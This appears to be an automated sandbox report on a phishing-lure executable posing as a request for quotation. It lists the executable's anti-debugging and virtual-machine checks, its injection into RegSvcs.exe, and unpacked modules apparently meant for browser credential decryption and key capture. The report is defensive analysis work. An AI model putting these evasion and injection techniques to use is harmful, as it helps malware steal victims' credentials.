Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\Spectrum.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	API coverage: 5.0 %
Source: C:\Windows\SysWOW64\perfhost.exe	API coverage: 0.0 %

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe TID: 7432	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\msdtc.exe TID: 7828	Thread sleep count: 494 > 30	Jump to behavior
Source: C:\Windows\System32\msdtc.exe TID: 7828	Thread sleep time: -49400s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920	Thread sleep count: 7345 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920	Thread sleep time: -73450000s >= -30000s
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920	Thread sleep count: 2653 > 30
Source: C:\Windows\SysWOW64\perfhost.exe TID: 7920	Thread sleep time: -26530000s >= -30000s

Source: C:\Windows\SysWOW64\perfhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\perfhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004049A0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598841	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598514	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597569	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597268	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597148	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595042	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594932	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594652	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594545	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594423	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594062	Jump to behavior

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Source: SensorDataService.exe, 0000000D.00000003.1766297686.000000000050D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device^
Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: t Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter\System32\DDORes.d
Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V GenerZ
Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000642000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000000F.00000002.2932590100.000000000061E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @oem2.infloc.vmwarebusdevicedescVMware VMCI Bus Devicer
Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000642000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .inVMware Virtual disk SCSI Disk Devicet System Management
Source: Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: BBSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: SensorDataService.exe, 0000000D.00000003.1766237858.0000000000525000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000000D.00000003.1766027536.0000000000523000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000000D.00000003.1766130152.0000000000523000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure DriverT_R
Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000631000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver
Source: SensorDataService.exe, 0000000D.00000003.1868494320.0000000000526000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fRSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000r
Source: Spectrum.exe, 0000000F.00000002.2932590100.00000000005E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ^Microsoft Hyper-V Virtualization Infrastructure Drivertion Infrastructure Driver0
Source: armsvc.exe, armsvc.exe, 00000001.00000003.1764615708.000000000073F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2102549025.000000000073F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1723140950.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2334989969.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1744374270.000000000073F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1700090715.000000000073F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.2101953987.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1744244802.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1764341618.0000000000726000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.000000000073F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840081813.0000000000726000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SensorDataService.exe, 0000000D.00000003.1766027536.0000000000513000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000003.1787833762.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wgencounter.inf,%gencounter.devicedesc%;Microsoft Hyper-V Generation Counter
Source: Spectrum.exe, 0000000F.00000002.2940144676.0000000000640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 0000000F.00000002.2940144676.0000000000640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000642000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: snmptrap.exe, 0000000E.00000002.2920808237.00000000004B4000.00000004.00000020.00020000.00000000.sdmp, ssh-agent.exe, 00000011.00000002.2927597319.000000000050D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SensorDataService.exe, 0000000D.00000003.1766027536.0000000000513000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000003.1787833762.0000000000631000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @wvid.inf,%vid.devicedesc%;Microsoft Hyper-V Virtualization Infrastructure Driver`
Source: SensorDataService.exe, 0000000D.00000003.1766297686.000000000050D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: nfNECVMWar VMware SATA CD00NDIS Virtual Net<
Source: REQUEST FOR QUOTATION 1307-RFQ.exe, 00000000.00000002.1685534324.0000000000C94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS-~%
Source: Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: v@oem2.inf,%loc.vmwarebusdevicedesc%;VMware VMCI Bus Device
Source: Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4NECVMWar VMware SATA CD00
Source: Spectrum.exe, 0000000F.00000002.2940144676.0000000000640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000642000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00
Source: Spectrum.exe, 0000000F.00000003.1786307281.0000000000642000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware VMCI Bus Devicesdevicedesc%;VMware VMCI Bus Device
Source: SensorDataService.exe, 0000000D.00000003.1766027536.0000000000523000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000000D.00000003.1766130152.0000000000523000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Basic Display Driverkname%;Microsoft Basic Display Driverosoft Hyper-V Gener
Source: SensorDataService.exe, 0000000D.00000003.1766027536.0000000000523000.00000004.00000020.00020000.00000000.sdmp, SensorDataService.exe, 0000000D.00000003.1766130152.0000000000523000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000003.1787833762.0000000000640000.00000004.00000020.00020000.00000000.sdmp, Spectrum.exe, 0000000F.00000002.2940144676.0000000000640000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
Source: SensorDataService.exe, 0000000D.00000003.1766297686.000000000050D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QSCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: RegSvcs.exe, 00000002.00000002.2939718488.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllolel%l
Source: Spectrum.exe, 0000000F.00000003.1786203148.0000000000633000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JVMware Virtual disk SCSI Disk Device

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	API call chain: ExitProcess graph end node			graph_0-108725
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	API call chain: ExitProcess graph end node			graph_0-109067

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00473F09 BlockInput,

0_2_00473F09

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00435A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00435A7C

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00539594 mov eax, dword ptr fs:[00000030h]	0_2_00539594
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00AE1130 mov eax, dword ptr fs:[00000030h]	0_2_00AE1130
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B23F3D mov eax, dword ptr fs:[00000030h]	0_2_00B23F3D
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00C934F8 mov eax, dword ptr fs:[00000030h]	0_2_00C934F8
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00C93558 mov eax, dword ptr fs:[00000030h]	0_2_00C93558
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00C91E78 mov eax, dword ptr fs:[00000030h]	0_2_00C91E78
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 11_2_00951130 mov eax, dword ptr fs:[00000030h]	11_2_00951130
Source: C:\Windows\SysWOW64\perfhost.exe	Code function: 11_2_00993F3D mov eax, dword ptr fs:[00000030h]	11_2_00993F3D

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_004580A9

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A155
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_0042A124 SetUnhandledExceptionFilter,	0_2_0042A124
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B21361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B21361
Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe	Code function: 0_2_00B24C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B24C7B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

.NET source code references suspicious native API functions

HIPS / PFW / Operating System Protection Evasion

Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: 0.2.REQUEST FOR QUOTATION 1307-RFQ.exe.3ee0000.2.raw.unpack, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtOpenKeyEx: Indirect: 0x140077B9B	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtQueryValueKey: Indirect: 0x140077C9F	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	NtClose: Indirect: 0x140077E81

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Writes to foreign memory regions

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 83C008

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_004587B1 LogonUserW,

0_2_004587B1

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00403B3A

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_004048D7

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00464C53 mouse_event,

0_2_00464C53

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe"

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00457CAF

Source: C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe

Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0045874B

Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: REQUEST FOR QUOTATION 1307-RFQ.exe	Binary or memory string: Shell_TrayWnd
Source: Acrobat.exe.1.dr	Binary or memory string: REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 INSTALLUWPAPP=1 IS_COEX_REPAIR=1 /qn/qb REINSTALLMODE=omus DISABLE_FIU_CHECK=1 IGNOREAAM=1 REPAIRFROMAPP=1 BROADCASTCEFRELOAD=1 \/0\cef_/qn CLEANUP_CEFFOLDER=1 DISABLE_FIU_CHECK=1 /i msiexec.exe/i ADD_ALL_DICT=1 REINSTALL=AdobeCommonLinguistics SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn.msiexec.exe/i ADDLOCAL=OptionalFeatures,DistillerCJKNative,DistillerCJKSupport,PaperCaptureOptional,PreFlightPlugin DISABLE_FIU_CHECK=1 TRANSITION_INSTALL_MODE=4 SKIP_WEBRCS_REINSTALL=1 SKIP_CEF_KILL=1 /qn\msiexec.exeSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.pdf\OpenWithList\MRUListAcrobat.exeMRUListAppDoNotTakePDFOwnershipAtLaunch\\\AppDoNotTakePDFOwnershipAtLaunchWin10DisableOwnershipPrompt.pdf.pdfxml.acrobatsecuritysettings.fdf.xfdf.xdp.pdx.api.secstore.sequ.rmf.bpdxAdobe Acrobat XI ProRtlGetVersionntdll.dll\??\UNC\\\?\UNC\\Device\Mup\\Device\LanmanRedirector\\Device\WebDavRedirector\\Device\WinDfs\\Device\NetWareRedirector\\Device\nwrdr\RtlGetVersionntdll.dllAdobe Systems, IncorporatedAdobe Inc.Adobe Systems 